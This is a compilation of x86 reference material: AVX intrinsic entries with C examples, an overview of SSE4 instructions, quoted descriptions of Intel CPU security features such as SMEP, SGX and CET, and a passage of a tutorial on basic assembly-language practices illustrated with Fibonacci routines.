INTERLEAVE_QWORDS(src1[127:0], src2[127:0]){ dst[63:0] := src1[63:0] dst[127:64] := src2[63:0] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_QWORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_QWORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vunpcklps
__m256 _mm256_unpacklo_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_unpacklo_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vunpcklps ymm, ymm, ymm
CPUID Flags: AVX

Description

Unpack and interleave single-precision (32-bit) floating-point elements from the low half of each 128-bit lane in a and b, and store the results in dst.

Operation

INTERLEAVE_DWORDS(src1[127:0], src2[127:0]){ dst[31:0] := src1[31:0] dst[63:32] := src2[31:0] dst[95:64] := src1[63:32] dst[127:96] := src2[63:32] RETURN dst[127:0] } dst[127:0] := INTERLEAVE_DWORDS(a[127:0], b[127:0]) dst[255:128] := INTERLEAVE_DWORDS(a[255:128], b[255:128]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
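
As with the shuffles, unpacking interleaves within each 128-bit lane separately (the integer forms above behave the same way). A short sketch (assumes -mavx):

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    __m256 a = _mm256_set_ps(7, 6, 5, 4, 3, 2, 1, 0);         /* 0..7   */
    __m256 b = _mm256_set_ps(17, 16, 15, 14, 13, 12, 11, 10); /* 10..17 */

    __m256 lo = _mm256_unpacklo_ps(a, b);
    __m256 hi = _mm256_unpackhi_ps(a, b);

    float out[8];
    _mm256_storeu_ps(out, lo);
    for (int i = 0; i < 8; i++) printf("%g ", out[i]);
    printf("\n");   /* prints: 0 10 1 11 4 14 5 15 */
    _mm256_storeu_ps(out, hi);
    for (int i = 0; i < 8; i++) printf("%g ", out[i]);
    printf("\n");   /* prints: 2 12 3 13 6 16 7 17 */
    return 0;
}
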
vxorpd
__m256d _mm256_xor_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_xor_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vxorpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise XOR of packed double-precision (64-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[i+63:i] XOR b[i+63:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vxorps
__m256 _mm256_xor_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_xor_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vxorps ymm, ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise XOR of packed single-precision (32-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[i+31:i] XOR b[i+31:i] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpxor
__m256i _mm256_xor_si256 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_xor_si256 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpxor ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compute the bitwise XOR of 256 bits (representing integer data) in a and b, and store the result in dst.

Operation

dst[255:0] := (a[255:0] XOR b[255:0]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
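
A classic use of the floating-point XOR forms is flipping sign bits without touching the rest of the value. A minimal sketch (assumes -mavx):

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    __m256 v       = _mm256_set_ps(8, -7, 6, -5, 4, -3, 2, -1);
    __m256 signbit = _mm256_set1_ps(-0.0f);        /* only bit 31 set in each element */
    __m256 negated = _mm256_xor_ps(v, signbit);    /* negates every element */

    float out[8];
    _mm256_storeu_ps(out, negated);
    for (int i = 0; i < 8; i++) printf("%g ", out[i]);
    printf("\n");   /* prints: 1 -2 3 -4 5 -6 7 -8 */
    return 0;
}
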
vzeroall
void _mm256_zeroall (void)

Synopsis

void _mm256_zeroall (void)
#include «immintrin.h»
Instruction: vzeroall
CPUID Flags: AVX

Description

Zero the contents of all XMM or YMM registers.

Operation

YMM0[MAX:0] := 0 YMM1[MAX:0] := 0 YMM2[MAX:0] := 0 YMM3[MAX:0] := 0 YMM4[MAX:0] := 0 YMM5[MAX:0] := 0 YMM6[MAX:0] := 0 YMM7[MAX:0] := 0 IF 64-bit mode YMM8[MAX:0] := 0 YMM9[MAX:0] := 0 YMM10[MAX:0] := 0 YMM11[MAX:0] := 0 YMM12[MAX:0] := 0 YMM13[MAX:0] := 0 YMM14[MAX:0] := 0 YMM15[MAX:0] := 0 FI
vzeroupper
void _mm256_zeroupper (void)

Synopsis

void _mm256_zeroupper (void)
#include «immintrin.h»
Instruction: vzeroupper
CPUID Flags: AVX

Description

Zero the upper 128 bits of all YMM registers; the lower 128 bits of the registers are left unmodified.

Operation

YMM0[MAX:128] := 0 YMM1[MAX:128] := 0 YMM2[MAX:128] := 0 YMM3[MAX:128] := 0 YMM4[MAX:128] := 0 YMM5[MAX:128] := 0 YMM6[MAX:128] := 0 YMM7[MAX:128] := 0 IF 64-bit mode YMM8[MAX:128] := 0 YMM9[MAX:128] := 0 YMM10[MAX:128] := 0 YMM11[MAX:128] := 0 YMM12[MAX:128] := 0 YMM13[MAX:128] := 0 YMM14[MAX:128] := 0 YMM15[MAX:128] := 0 FI

Performance

Architecture Latency Throughput
Haswell 0 1
Ivy Bridge 0 1
Sandy Bridge 0 1
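
vzeroupper matters when 256-bit AVX code calls into legacy SSE code: dirty upper YMM halves can cause costly AVX/SSE transition penalties on some microarchitectures. A hedged sketch (legacy_sse_code is a hypothetical stand-in; compilers usually emit vzeroupper automatically at function boundaries, so the explicit call is rarely needed):

#include <immintrin.h>

/* Stand-in for a routine compiled for SSE only (hypothetical). */
static void legacy_sse_code(void) { }

void copy8_then_call_sse(float *dst, const float *src)
{
    __m256 v = _mm256_loadu_ps(src);
    _mm256_storeu_ps(dst, v);
    _mm256_zeroupper();     /* clear the upper YMM halves before the SSE call */
    legacy_sse_code();
}
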

SSE4 — CPU instruction set used in the Intel Core microarchitecture and in AMD processors

SSE4 consists of 54 instructions, 47 of which belong to SSE4.1 (present in Penryn processors). The full set (SSE4.1 plus the remaining 7 SSE4.2 instructions) is available in Intel processors based on the Nehalem microarchitecture, released in mid-November 2008, and in later designs. None of the SSE4 instructions operate on the 64-bit MMX registers, only on the 128-bit registers xmm0-xmm15.

Intel's C compiler generates SSE4 instructions starting with version 10 when the -QxS option is given. Sun Microsystems' Sun Studio compiler generates SSE4 instructions from version 12 update 1 with the -xarch=sse4_1 (SSE4.1) and -xarch=sse4_2 (SSE4.2) options. GCC supports SSE4.1 and SSE4.2 since version 4.3 via the -msse4.1 and -msse4.2 options, or -msse4, which enables both.

SSE4.1 instructions
Video acceleration

  • MPSADBW xmm1, xmm2/m128, imm8 — (Multiple Packed Sums of Absolute Difference)
    • Input — { A0, A1,… A14 }, { B0, B1,… B15 }, Shiftmode
    • Output — { SAD0, SAD1, SAD2,… SAD7 }

Computes eight sums of absolute differences (SAD) over shifted 4-byte unsigned groups. The operand positions for the 16-bit SADs are selected by 3 bits of the immediate argument imm8.

s1 = imm8[2]*4
s2 = imm8[1:0]*4
SAD0 = |A(s1+0)-B(s2+0)| + |A(s1+1)-B(s2+1)| + |A(s1+2)-B(s2+2)| + |A(s1+3)-B(s2+3)|
SAD1 = |A(s1+1)-B(s2+0)| + |A(s1+2)-B(s2+1)| + |A(s1+3)-B(s2+2)| + |A(s1+4)-B(s2+3)|
SAD2 = |A(s1+2)-B(s2+0)| + |A(s1+3)-B(s2+1)| + |A(s1+4)-B(s2+2)| + |A(s1+5)-B(s2+3)|
...
SAD7 = |A(s1+7)-B(s2+0)| + |A(s1+8)-B(s2+1)| + |A(s1+9)-B(s2+2)| + |A(s1+10)-B(s2+3)|
  • PHMINPOSUW xmm1, xmm2/m128 — (Packed Horizontal Word Minimum)
    • Input — { A0, A1,… A7 }
    • Output — { MinVal, MinPos, 0, 0… }

Finds, among the 16-bit unsigned fields A0…A7, the field with the minimum value (and the lowest position if several fields share it). The 16-bit value and its position are returned.

  • PMOV{SX,ZX}{B,W,D} xmm1, xmm2/m{64,32,16} — (Packed Move with Sign/Zero Extend)

A group of 12 instructions for widening packed field formats. Packed 8-, 16-, or 32-bit fields from the low part of the argument are extended (with sign or zero extension) into the 16-, 32-, or 64-bit fields of the result.

Result format   8-bit input   16-bit input   32-bit input
16-bit          PMOVSXBW
                PMOVZXBW
32-bit          PMOVSXBD      PMOVSXWD
                PMOVZXBD      PMOVZXWD
64-bit          PMOVSXBQ      PMOVSXWQ       PMOVSXDQ
                PMOVZXBQ      PMOVZXWQ       PMOVZXDQ

Vector primitives

  • P{MIN,MAX}{SB,UW,SD,UD} xmm1, xmm2/m128 — (Minimum/Maximum of Packed Signed/Unsigned Byte/Word/DWord Integers)

Each field of the result is the minimum/maximum of the corresponding fields of the two arguments. Byte fields are treated only as signed numbers, 16-bit fields only as unsigned. For 32-bit packed fields, both signed and unsigned variants are provided.

  • PMULDQ xmm1, xmm2/m128 — (Multiply Packed Signed Dword Integers)
    • Input — { A0, A1, A2, A3 }, { B0, B1, B2, B3 }
    • Output — { A0*B0, A2*B2 }
      Multiplies signed 32-bit fields, producing the full 64-bit results (two multiplications, over fields 0 and 2 of the arguments).
  • PMULLD xmm1, xmm2/m128 — (Multiply Packed Signed Dword Integers and Store Low Result)
    • Input — { A0, A1, A2, A3 }, { B0, B1, B2, B3 }
    • Output — { low32(A0*B0), low32(A1*B1), low32(A2*B2), low32(A3*B3) }
      Multiplies signed 32-bit fields, producing the low 32 bits of each result (four multiplications, over all fields of the arguments).
  • PACKUSDW xmm1, xmm2/m128 — (Pack with Unsigned Saturation)
    Packs signed 32-bit fields into unsigned 16-bit fields with saturation.
  • PCMPEQQ xmm1, xmm2/m128 — (Compare Packed Qword Data for Equal)
    Tests 64-bit fields for equality and produces 64-bit masks.

    Insertions/extractions

    • INSERTPS xmm1, xmm2/m32, imm8 — (Insert Packed Single Precision Floating-Point Value)

    Inserts a 32-bit field from xmm2 (any of the 4 fields of that register can be selected) or from a 32-bit memory location into an arbitrary field of the result. In addition, any field of the result can be forced to +0.0.

    • EXTRACTPS r/m32, xmm, imm8 — (Extract Packed Single Precision Floating-Point Value)

    Extracts a 32-bit field from an xmm register; the field number is given in the low 2 bits of imm8. If a 64-bit register is specified as the destination, its upper 32 bits are cleared (zero extension).

    • PINSR{B,D,Q} xmm, r/m*, imm8 — (Insert Byte/Dword/Qword)

    Inserts an 8-, 32-, or 64-bit value into the specified field of an xmm register (the other fields are unchanged).

    • PEXTR{B,W,D,Q} r/m*, xmm, imm8 — (Extract Byte/Word/Dword/Qword)

    Extracts an 8-, 16-, 32-, or 64-bit field from the xmm register field specified in imm8. If a register is specified as the destination, its upper part is cleared (zero extension).

    Dot products

    • DPPS xmm1, xmm2/m128, imm8 — (Dot Product of Packed Single Precision Floating-Point Values)
    • DPPD xmm1, xmm2/m128, imm8 — (Dot Product of Packed Double Precision Floating-Point Values)

    Dot product of vectors of 32/64-bit fields. A bit mask in imm8 specifies which field products should be summed and what to write into each field of the result: the sum of the selected products or +0.0.

    Blending

    • BLENDV{PS,PD} xmm1, xmm2/m128, <xmm0> — (Variable Blend Packed Single/Double Precision Floating-Point Values)

    Each 32/64-bit field of the result is selected from either the first or the second argument, depending on the sign of the same field in the implicit argument xmm0.

    • BLEND{PS,PD} xmm1, xmm2/m128, imm8 — (Blend Packed Single/Double Precision Floating-Point Values)

    A bit mask (4 or 2 bits) in imm8 specifies from which argument each 32/64-bit field of the result is taken.

    • PBLENDVB xmm1, xmm2/m128, <xmm0> — (Variable Blend Packed Bytes)

    Each byte field of the result is selected from either the first or the second argument, depending on the sign of the byte in the same field of the implicit argument xmm0.

    • PBLENDW xmm1, xmm2/m128, imm8 — (Blend Packed Words)

    A bit mask (8 bits) in imm8 specifies from which argument each 16-bit field of the result is taken.

    Bit tests

    • PTEST xmm1, xmm2/m128 — (Logical Compare)

    Sets the ZF flag only if all the bits in xmm2/m128 that are marked by the mask in xmm1 are zero. If all the unmarked bits are zero, the CF flag is set. The remaining flags (AF, OF, PF, SF) are always cleared. The instruction does not modify xmm1.
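
    For instance, a sketch of common usage (not taken from the original text): PTEST of a register with itself checks whether the whole 128-bit value is zero.

    ptest xmm0, xmm0    ; ZF = 1 only if every bit of xmm0 is zero
    jz    all_zero      ; branch taken when xmm0 == 0 (all_zero is a hypothetical label)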

    Rounding

    • ROUND{PS, PD} xmm1, xmm2/m128, imm8 — (Round Packed Single/Double Precision Floating-Point Values)

    Rounds all 32/64-bit fields. The rounding mode (4 variants) is selected either from MXCSR.RC or given directly in imm8. Generation of the precision (inexact) exception can also be suppressed.

    • ROUND{SS, SD} xmm1, xmm2/m128, imm8 — (Round Scalar Single/Double Precision Floating-Point Values)

    Rounds only the low 32/64-bit field (the remaining bits are unchanged).

    Reading WC memory

    • MOVNTDQA xmm1, m128 — (Load Double Quadword Non-Temporal Aligned Hint)

    A load operation that can speed up work with write-combining memory regions (by up to 7.5 times).

    New SSE4.2 instructions

    String processing

    These instructions perform arithmetic comparisons between all possible pairs of fields (64 or 256 comparisons!) from the two strings given by the contents of xmm1 and xmm2/m128. The boolean comparison results are then processed to obtain the desired output. The immediate argument imm8 controls the size (byte or Unicode strings, up to 16/8 elements each), the signedness of the fields (string elements), the type of comparison, and the interpretation of the results.

    They can be used to search a string (memory region) for characters from a given set or within given ranges. They can also compare strings (memory regions) or search for substrings.

    All of them affect the processor flags: SF is set if xmm1 does not hold a full string, ZF if xmm2/m128 does not hold a full string, CF if the result is non-zero, and OF if the least significant bit of the result is non-zero. The AF and PF flags are cleared.

    • PCMPESTRI <ecx>, xmm1, xmm2/m128, <eax>, <edx>, imm8 — (Packed Compare Explicit Length Strings, Return Index)

    The string lengths are given explicitly in <eax> and <edx> (the absolute value of each register is taken, saturated to 8/16 depending on the size of the string elements). The result is in the ecx register.

    • PCMPESTRM <xmm0>, xmm1, xmm2/m128, <eax>, <edx>, imm8 — (Packed Compare Explicit Length Strings, Return Mask)

    The string lengths are given explicitly in <eax> and <edx> (the absolute value of each register is taken, saturated to 8/16 depending on the size of the string elements). The result is in the xmm0 register.

    • PCMPISTRI <ecx>, xmm1, xmm2/m128, imm8 — (Packed Compare Implicit Length Strings, Return Index)

    The string lengths are determined implicitly (a search for null elements is performed in each string). The result is in the ecx register.

    • PCMPISTRM <xmm0>, xmm1, xmm2/m128, imm8 — (Packed Compare Implicit Length Strings, Return Mask)

    The string lengths are determined implicitly (a search for null elements is performed in each string). The result is in the xmm0 register.

    CRC32 computation

    • CRC32 r32, r/m* — (Accumulate CRC32 Value)

    Accumulates a CRC-32C value (also designated CRC-32/ISCSI, CRC-32/CASTAGNOLI) for an 8-, 16-, 32-, or 64-bit argument (the polynomial 0x1EDC6F41 is used).
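
    A sketch of accumulating CRC-32C over a byte buffer (buf and len are hypothetical names; the seed value and final inversion below follow the usual CRC-32C convention, which may differ from what a given protocol needs):

        mov   eax, 0FFFFFFFFh        ; typical CRC-32C seed
        mov   esi, OFFSET buf
        mov   ecx, len
    next:
        crc32 eax, byte ptr [esi]    ; accumulate one byte into the running CRC
        inc   esi
        loop  next
        not   eax                    ; final inversion for the conventional CRC-32C result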

    Population count of set bits

    • POPCNT r, r/m* — (Return the Count of Number of Bits Set to 1)

    Counts the number of bits set to 1. There are three variants of the instruction: for 16-, 32-, and 64-bit registers. Also present in AMD's SSE4a.

    Vector primitives

    • PCMPGTQ xmm1, xmm2/m128 — (Compare Packed Qword Data for Greater Than)

    Tests 64-bit fields for "greater than" and produces 64-bit masks.

    SSE4a

    The SSE4a instruction set was introduced by AMD in processors based on the Barcelona architecture. This extension is not available in Intel processors. Support is indicated by the CPUID.80000001H:ECX.SSE4A[Bit 6] flag.

    Instruction      Description
    LZCNT/POPCNT     Count the number of leading zero / set bits.
    EXTRQ/INSERTQ    Combined mask-and-shift instructions
    MOVNTSD/MOVNTSS  Scalar streaming store instructions


Intel CPU security features

List of Intel CPU security features along with short descriptions taken from the Intel manuals.

WP (Write Protect) (PDF)

Quoting Volume 3A, 4-3, Paragraph 4.1.3:

CR0.WP allows pages to be protected from supervisor-mode writes. If CR0.WP = 0, supervisor-mode write accesses are allowed to linear addresses with read-only access rights; if CR0.WP = 1, they are not (User-mode write accesses are never allowed to linear addresses with read-only access rights, regardless of the value of CR0.WP).

NXE/XD (No-Execute Enable/Execute Disable) (PDF)

Regarding IA32_EFER MSR and NXE (Volume 3A, 4-3, Paragraph 4.1.3):

IA32_EFER.NXE enables execute-disable access rights for PAE paging and IA-32e paging. If IA32_EFER.NXE = 1, instruction fetches can be prevented from specified linear addresses (even if data reads from the addresses are allowed).

IA32_EFER.NXE has no effect with 32-bit paging. Software that wants to use this feature to limit instruction fetches from readable pages must use either PAE paging or IA-32e paging.

Regarding XD (Volume 3A, 4-17, Table 4-11):

If IA32_EFER.NXE = 1, execute-disable (if 1, instruction fetches are not allowed from the 4-KByte page controlled by this entry; see Section 4.6); otherwise, reserved (must be 0).

SMAP (Supervisor Mode Access Protection) (PDF)

Quoting Volume 3A, 4-3, Paragraph 4.1.3:

CR4.SMAP allows pages to be protected from supervisor-mode data accesses. If CR4.SMAP = 1, software operating in supervisor mode cannot access data at linear addresses that are accessible in user mode. Software can override this protection by setting EFLAGS.AC.

SMEP (Supervisor Mode Execution Protection) (PDF)

Quoting Volume 3A, 4-3, Paragraph 4.1.3:

CR4.SMEP allows pages to be protected from supervisor-mode instruction fetches. If CR4.SMEP = 1, software operating in supervisor mode cannot fetch instructions from linear addresses that are accessible in user mode.

MPX (Memory Protection Extensions) (PDF)

Intel MPX introduces new bounds registers and new instructions that operate on bounds registers. Intel MPX allows an OS to support user mode software (operating at CPL = 3) and supervisor mode software (CPL < 3) to add memory protection capability against buffer overrun. It provides controls to enable Intel MPX extensions for user mode and supervisor mode independently. Intel MPX extensions are designed to allow software to associate bounds with pointers, and allow software to check memory references against the bounds associated with the pointer to prevent out of bound memory access (thus preventing buffer overflow).

SGX (Software Guard Extensions) (PDF)

These extensions allow an application to instantiate a protected container, referred to as an enclave. An enclave is a protected area in the application’s address space (see Figure 1-1), which provides confidentiality and integrity even in the presence of privileged malware. Accesses to the enclave memory area from any software not resident in the enclave are prevented.

Protection keys (PDF)

Quoting Volume 3A, 4-31, Paragraph 4.6.2:

The protection-key feature provides an additional mechanism by which IA-32e paging controls access to user-mode addresses. When CR4.PKE = 1, every linear address is associated with the 4-bit protection key located in bits 62:59 of the paging-structure entry that mapped the page containing the linear address. The PKRU register determines, for each protection key, whether user-mode addresses with that protection key may be read or written.
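
The PKRU update itself is a single instruction. As a minimal sketch (the new value in EAX is an assumed input prepared by the caller; WRPKRU requires ECX and EDX to be zero):

mov  eax, new_pkru    ; new_pkru is a hypothetical 32-bit access-rights mask
xor  ecx, ecx         ; WRPKRU requires ECX = 0
xor  edx, edx         ; ... and EDX = 0
wrpkru                ; write EAX into the PKRU register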

The following paragraphs, taken from LWN, shed some light on the purpose of memory protection keys:

One might well wonder why this feature is needed when everything it does can be achieved with the memory-protection bits that already exist. The problem with the current bits is that they can be expensive to manipulate. A change requires invalidating translation lookaside buffer (TLB) entries across the entire system, which is bad enough, but changing the protections on a region of memory can require individually changing the page-table entries for thousands (or more) pages. Instead, once the protection keys are set, a region of memory can be enabled or disabled with a single register write. For any application that frequently changes the protections on regions of its address space, the performance improvement will be large.

There is still the question (as asked by Ingo Molnar) of just why a process would want to make this kind of frequent memory-protection change. There would appear to be a few use cases driving this development. One is the handling of sensitive cryptographic data. A network-facing daemon could use a cryptographic key to encrypt data to be sent over the wire, then disable access to the memory holding the key (and the plain-text data) before writing the data out. At that point, there is no way that the daemon can leak the key or the plain text over the wire; protecting sensitive data in this way might also make applications a bit more resistant to attack.

Another commonly mentioned use case is to protect regions of data from being corrupted by «stray» write operations. An in-memory database could prevent writes to the actual data most of the time, enabling them only briefly when an actual change needs to be made. In this way, database corruption due to bugs could be fended off, at least some of the time. Ingo was unconvinced by this use case; he suggested that a 64-bit address space should be big enough to hide data in and protect it from corruption. He also suggested that a version of mprotect() that optionally skipped TLB invalidation could address many of the performance issues, especially if huge pages were used. Alan Cox responded, though, that there is real-world demand for the ability to change protection on gigabytes of memory at a time, and that mprotect() is simply too slow.

CET (Control-flow Enforcement Technology) (PDF)

Control-flow Enforcement Technology (CET) provides the following capabilities to defend against ROP/JOP style control-flow subversion attacks:

  • Shadow Stack – return address protection to defend against Return Oriented Programming,
  • Indirect branch tracking – free branch protection to defend against Jump/Call Oriented Programming.
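
With indirect branch tracking enabled, the target of an indirect CALL or JMP must begin with an ENDBRANCH instruction (ENDBR64 in 64-bit mode). A minimal 64-bit sketch, with handler as a hypothetical routine:

handler:
    endbr64              ; valid landing pad for tracked indirect branches
    ; ... routine body ...
    ret

    lea  rax, handler
    call rax             ; indirect call checked by CET indirect branch tracking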

Basic Practices in Assembly Language Programming


Introduction

Assembly language is a low-level programming language for niche platforms such as IoT devices, device drivers, and embedded systems. Usually, it's the sort of language that Computer Science students cover in their coursework and rarely use in their future jobs. Yet according to the TIOBE Programming Community Index, assembly language has enjoyed a steady rise in the rankings of the most popular programming languages recently.

In the early days, when an application was written in assembly language, it had to fit in a small amount of memory and run as efficiently as possible on slow processors. Now that memory is plentiful and processor speed has increased dramatically, we mainly rely on high-level languages with ready-made structures and libraries for development. If necessary, assembly language can still be used to optimize critical sections for speed or to access non-portable hardware directly. Today assembly language continues to play an important role in embedded system design, where performance efficiency remains an important requirement.

In this article, we'll talk about some basic criteria and coding skills specific to assembly language programming, with emphasis on execution speed and memory consumption. I'll analyze examples related to registers, memory, and the stack, operators and constants, loops and procedures, system calls, etc. For simplicity, all samples are 32-bit, but most ideas apply easily to 64-bit.

All the materials presented here come from my years of teaching [1]. To read this article, a general understanding of Intel x86-64 assembly language is necessary, and familiarity with Visual Studio 2010 or above is assumed. Having read Kip Irvine's textbook [2] and the MASM Programmer's Guide [3] is recommended. If you are taking an Assembly Language Programming class, this could be supplemental reading for your studies.

About instruction

The first two rules are general. If you can use less, don’t use more.

1. Using fewer instructions

Suppose that we have a 32-bit DWORD variable:

.data
   var1 DWORD 123

The example is to add var1 to EAX. This is correct with MOV and ADD:

mov ebx, var1
add eax, ebx

But as ADD can accept one memory operand, you can just

add eax, var1

2. Using an instruction with fewer bytes

Suppose that we have an array:

.data
   array DWORD 1,2,3

If you want to rearrange the values to be 3,1,2, you could do:

mov eax,array           ;        eax =1
xchg eax,[array+4]      ; 1,1,3, eax =2
xchg eax,[array+8]      ; 1,1,2, eax =3
xchg array,eax          ; 3,1,2, eax =1

But notice that the last instruction should be MOV instead of XCHG. Although both can assign the 3 in EAX to the first array element, the reverse copy that XCHG also performs is logically unnecessary.

Be aware of code size too: MOV takes 5 bytes of machine code while XCHG takes 6, another reason to choose MOV here:

00000011  87 05 00000000 R      xchg array,eax
00000017  A3 00000000 R         mov array,eax

To check the machine code, you can generate a listing file when assembling, or open the Disassembly window at runtime in Visual Studio. You can also look it up in the Intel instruction manual.

About register and memory

In this section, we’ll use a popular example, the nth Fibonacci number, to illustrate multiple solutions in assembly language. The C function would be like:

unsigned int Fibonacci(unsigned int n)
{
    unsigned int previous = 1, current = 1, next = 1;   // start next at 1 so n = 1 and n = 2 also return 1
    for (unsigned int i = 3; i <= n; ++i) 
    {
        next = current + previous;
        previous = current;
        current = next;
    }
    return next;
}

3. Implementing with memory variables

First, let's copy the same idea from above, with the two variables previous and current defined here:

.data
   previous DWORD ?
   current  DWORD ?

We can use EAX to store the result, without the next variable. Since MOV cannot move from memory to memory, a register like EDX must be involved for the assignment previous = current. The following is the procedure FibonacciByMemory. It receives n in ECX and returns EAX as the nth Fibonacci number calculated:

;------------------------------------------------------------
FibonacciByMemory PROC 
; Receives: ECX as input n 
; Returns: EAX as nth Fibonacci number calculated
;------------------------------------------------------------
   mov   eax,1         
   mov   previous,0         
   mov   current,0         
L1:
   add eax,previous       ; eax = current + previous      
   mov edx, current       ; previous = current
   mov previous, edx
   mov current, eax
loop   L1
   ret
FibonacciByMemory ENDP

4. If you can use registers, don’t use memory

A basic rule in assembly language programming is that if you can use a register, don't use a variable. Register operations are much faster than memory operations. The general-purpose registers available in 32-bit mode are EAX, EBX, ECX, EDX, ESI, and EDI. Don't touch ESP and EBP, which are for system use.

Now let EBX replace the previous variable and EDX replace current. The following is FibonacciByRegMOV, simply with three instructions needed in the loop:

;------------------------------------------------------------
FibonacciByRegMOV PROC 
; Receives: ECX as input n 
; Returns: EAX, nth Fibonacci number
;------------------------------------------------------------
   mov   eax,1         
   xor   ebx,ebx      
   xor   edx,edx      
L1:
   add  eax,ebx      ; eax += ebx
   mov  ebx,edx
   mov  edx,eax
loop   L1
   ret
FibonacciByRegMOV ENDP

A further simplified version makes use of XCHG, which steps up the sequence without the need for EDX. The following shows the FibonacciByRegXCHG listing with its machine code, where the loop body contains only two instructions totaling three machine-code bytes:

           ;------------------------------------------------------------
000000DF    FibonacciByRegXCHG PROC
           ; Receives: ECX as input n
           ; Returns: EAX, nth Fibonacci number
           ;------------------------------------------------------------
000000DF  33 C0         xor   eax,eax
000000E1  BB 00000001   mov   ebx,1
000000E6             L1:
000000E6  93            xchg eax,ebx      ; step up the sequence
000000E7  03 C3         add  eax,ebx      ; eax += ebx
000000E9  E2 FB      loop   L1
000000EB  C3            ret
000000EC    FibonacciByRegXCHG ENDP

In concurrent programming

The x86-64 instruction set provides many atomic instructions, with the ability to temporarily inhibit interrupts so that the currently running process cannot be context switched; this suffices on a uniprocessor. In some ways, it also helps avoid race conditions in multitasking. These instructions can be used directly by compiler and operating system writers.

5. Using atomic instructions

The XCHG used above, the so-called atomic swap, does in one instruction what some high-level languages need several statements for:

xchg  eax, var1

A classical way to swap a register with a memory var1 could be

mov ebx, eax
mov eax, var1
mov var1, ebx

Moreover, if you use the Intel486 instruction set with the .486 directive or above, simply using the atomic XADD is more concise in the Fibonacci procedure. XADD exchanges the first operand (destination) with the second operand (source), then loads the sum of the two values into the destination operand. Thus we have

           ;------------------------------------------------------------
000000EC    FibonacciByRegXADD PROC
           ; Receives: ECX as input n
           ; Returns: EAX, nth Fibonacci number
           ;------------------------------------------------------------
000000EC  33 C0         xor   eax,eax
000000EE  BB 00000001   mov   ebx,1
000000F3             L1:
000000F3  0F C1 D8      xadd eax,ebx   ; first exchange and then add
000000F6  E2 FB      loop   L1
000000F8  C3            ret
000000F9    FibonacciByRegXADD ENDP

Two move-with-extension instructions worth noting are MOVZX and MOVSX. Also worth mentioning are the bit test instructions BT, BTC, BTR, and BTS. Consider the following example:

.data
  Semaphore WORD 10001000b
.code
  btc Semaphore, 6  ; CF=0, Semaphore WORD 11001000b

Imagine the instruction set without BTC, one non-atomic implementation for the same logic would be

mov ax, Semaphore
shr ax, 7
xor Semaphore,01000000b

Little-endian

An x86 processor stores and retrieves data from memory using little-endian order (low to high). The least significant byte is stored at the first memory address allocated for the data. The remaining bytes are stored in the next consecutive memory positions.

6. Memory representations

Consider the following data definitions:

.data
dw1 DWORD 12345678h
dw2 DWORD 'AB', '123', 123h
;dw3 DWORD 'ABCDE'  ; error A2084: constant value too large
by3 BYTE 'ABCDE', 0FFh, 'A', 0Dh, 0Ah, 0
w1 WORD 123h, 'AB', 'A'

For simplicity, the hexadecimal constants are used as initializer. The memory representation is as follows:
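
As a sketch of the byte-by-byte layout that these definitions produce (lowest address on the left):

; dw1:  78 56 34 12
; dw2:  42 41 00 00   33 32 31 00   23 01 00 00
; by3:  41 42 43 44   45 FF 41 0D   0A 00
; w1:   23 01 42 41   41 00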

As for multiple-byte DWORD and WORD data, they are stored in little-endian order. Based on this, the second DWORD, initialized with 'AB', should be 00004142h, and the next, '123', is 00313233h in their original order. You can't initialize dw3 as 'ABCDE', which would contain five bytes 4142434445h, while you really can initialize by3 that way as byte memory, since little-endian ordering does not apply to byte data. Similarly, see w1 for WORD memory.

7. A code error hidden by little-endian

From the last section on using XADD, we try to fill a byte array with the first 7 Fibonacci numbers: 01, 01, 02, 03, 05, 08, 0D. The following is such a simple implementation, but with a bug. The bug does not show up as an error immediately because it is hidden by little-endian storage.

FibCount = 7
.data
FibArray BYTE FibCount DUP(0ffh)
BYTE 'ABCDEF' 

.code
   mov  edi, OFFSET FibArray       
   mov  eax,1             
   xor  ebx,ebx          
   mov  ecx, FibCount        
 L1:
   mov  [edi], eax                
   xadd eax, ebx                      
   inc  edi                  
 loop L1

To debug, I purposely place the memory 'ABCDEF' at the end of the byte array FibArray, which is initialized with seven 0ffh bytes. The initial memory looks like this:

Let's set a breakpoint in the loop. When the first number 01 is filled in, it is followed by three zeros, like this:

But that seems OK: the second number 01 fills the second byte, overwriting the three zeros left by the first. So on and so forth, until the seventh number 0D just fits the last byte:

Everything looks fine, with the expected result in FibArray, because of little-endian storage. Only when you define some memory immediately after FibArray will its first three bytes be overwritten by zeros, as here 'ABCDEF' becomes 'DEF'. How do you make an easy fix?
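
One possible easy fix, sketched here as my own take on the exercise rather than the article's answer, is to store only the low byte AL instead of the whole EAX, so the neighboring memory is never touched:

 L1:
   mov  [edi], al     ; store one byte only, not a DWORD
   xadd eax, ebx
   inc  edi
 loop L1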

About runtime stack

